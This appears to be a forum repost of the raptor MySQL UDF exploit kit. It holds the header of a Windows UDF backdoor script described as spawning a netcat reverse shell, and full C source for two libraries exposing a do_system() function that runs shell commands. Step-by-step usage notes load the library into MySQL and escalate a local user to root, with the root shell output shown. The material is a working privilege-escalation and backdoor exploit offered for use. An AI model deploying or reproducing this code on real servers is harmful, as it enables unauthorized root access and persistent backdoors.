复制内容到剪贴板

代码:

-- raptor_winudf.sql - A MySQL UDF backdoor kit for Windows
-- Copyright (c) 2007 Marco Ivaldi <[email]raptor@0xdeadbeef.info[/email]>
--
-- This is a MySQL backdoor kit for Windows based on the UDFs (User Defined
-- Functions) mechanism. Use it to spawn a reverse shell (netcat UDF on port
-- 80/tcp) or to execute single OS commands (exec UDF). Don&#39;t forget to edit
-- the MySQL bin path below according to your target&#39;s configuration.
--
-- Thanks to KDM for asking me to do research on this interesting subject!
--
-- See also:
-- [url]http://www.0xdeadbeef.info/exploits/raptor_udf.c[/url]
-- [url]http://www.0xdeadbeef.info/exploits/raptor_udf2.c[/url]
--
-- Tested on:
-- MySQL 4.0.18-win32 (running on Windows XP SP2)
-- MySQL 4.1.22-win32 (running on Windows XP SP2)
-- MySQL 5.0.27-win32 (running on Windows XP SP2)

raptor_udf.c

复制内容到剪贴板

代码:

/*
* $Id: raptor_udf.c,v 1.1 2004/12/04 14:44:39 raptor Exp $
*
* raptor_udf.c - dynamic library for do_system() MySQL UDF
* Copyright (c) 2004 Marco Ivaldi <[email]raptor@0xdeadbeef.info[/email]>
*
* This is an helper dynamic library for local privilege escalation through
* MySQL run with root privileges (very bad idea!). Tested on MySQL 4.0.17.
*
* Code ripped from: [url]http://www.ngssoftware.com/papers/HackproofingMySQL.pdf[/url]
*
* "MySQL provides a mechanism by which the default set of functions can be
* expanded by means of custom written dynamic libraries containing User
* Defined Functions, or UDFs". -- Hackproofing MySQL
*
* Usage:
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf.c
* $ gcc -g -shared -W1,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc
* $ mysql -u root -p
* Enter password:
* [...]
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file(&#39;/home/raptor/raptor_udf.so&#39;));
* mysql> select * from foo into dumpfile &#39;/usr/lib/raptor_udf.so&#39;;
* mysql> create function do_system returns integer soname &#39;raptor_udf.so&#39;;
* mysql> select * from mysql.func;
* +-----------+-----+---------------+----------+
* | name    | ret | dl        | type    |
* +-----------+-----+---------------+----------+
* | do_system |  2 | raptor_udf.so | function |
* +-----------+-----+---------------+----------+
* mysql> select do_system(&#39;id > /tmp/out; chown raptor.raptor /tmp/out&#39;);
* mysql> \! sh
* sh-2.05b$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* [...]
*/

#include <stdio.h>
#include <stdlib.h>

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
  unsigned int    arg_count;  // number of arguments
  enum Item_result  *arg_type;  // pointer to item_result
  char       **args;    // pointer to arguments
  unsigned long    *lengths;  // length of string args
  char      *maybe_null;  // 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
  char      maybe_null;  // 1 if func can return NULL
  unsigned int    decimals;  // for real functions
  unsigned long     max_length;  // for string functions
  char      *ptr;    // free ptr for func data
  char      const_item;  // 0 if result is constant
} UDF_INIT;

int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
  if (args->arg_count != 1)
    return(0);

  system(args->args[0]);

  return(0);
}

raptor_udf2.c

复制内容到剪贴板

代码:

/*
* $Id: raptor_udf2.c,v 1.1 2006/01/18 17:58:54 raptor Exp $
*
* raptor_udf2.c - dynamic library for do_system() MySQL UDF
* Copyright (c) 2006 Marco Ivaldi <[email]raptor@0xdeadbeef.info[/email]>
*
* This is an helper dynamic library for local privilege escalation through
* MySQL run with root privileges (very bad idea!), slightly modified to work
* with newer versions of the open-source database. Tested on MySQL 4.1.14.
*
* See also: [url]http://www.0xdeadbeef.info/exploits/raptor_udf.c[/url]
*
* Starting from MySQL 4.1.10a and MySQL 4.0.24, newer releases include fixes
* for the security vulnerabilities in the handling of User Defined Functions
* (UDFs) reported by Stefano Di Paola <[email]stefano.dipaola@wisec.it[/email]>. For further
* details, please refer to:
*
* [url]http://dev.mysql.com/doc/refman/5.0/en/udf-security.html[/url]
* [url]http://www.wisec.it/vulns.php?page=4[/url]
* [url]http://www.wisec.it/vulns.php?page=5[/url]
* [url]http://www.wisec.it/vulns.php?page=6[/url]
*
* "UDFs should have at least one symbol defined in addition to the xxx symbol
* that corresponds to the main xxx() function. These auxiliary symbols
* correspond to the xxx_init(), xxx_deinit(), xxx_reset(), xxx_clear(), and
* xxx_add() functions". -- User Defined Functions Security Precautions
*
* Usage:
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf2.c
* $ gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
* $ mysql -u root -p
* Enter password:
* [...]
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file(&#39;/home/raptor/raptor_udf2.so&#39;));
* mysql> select * from foo into dumpfile &#39;/usr/lib/raptor_udf2.so&#39;;
* mysql> create function do_system returns integer soname &#39;raptor_udf2.so&#39;;
* mysql> select * from mysql.func;
* +-----------+-----+----------------+----------+
* | name    | ret | dl         | type    |
* +-----------+-----+----------------+----------+
* | do_system |  2 | raptor_udf2.so | function |
* +-----------+-----+----------------+----------+
* mysql> select do_system(&#39;id > /tmp/out; chown raptor.raptor /tmp/out&#39;);
* mysql> \! sh
* sh-2.05b$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* [...]
*/

#include <stdio.h>
#include <stdlib.h>

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
  unsigned int    arg_count;  // number of arguments
  enum Item_result  *arg_type;  // pointer to item_result
  char       **args;    // pointer to arguments
  unsigned long    *lengths;  // length of string args
  char      *maybe_null;  // 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
  char      maybe_null;  // 1 if func can return NULL
  unsigned int    decimals;  // for real functions
  unsigned long     max_length;  // for string functions
  char      *ptr;    // free ptr for func data
  char      const_item;  // 0 if result is constant
} UDF_INIT;

int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
  if (args->arg_count != 1)
    return(0);

  system(args->args[0]);

  return(0);
}

char do_system_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
  return(0);
}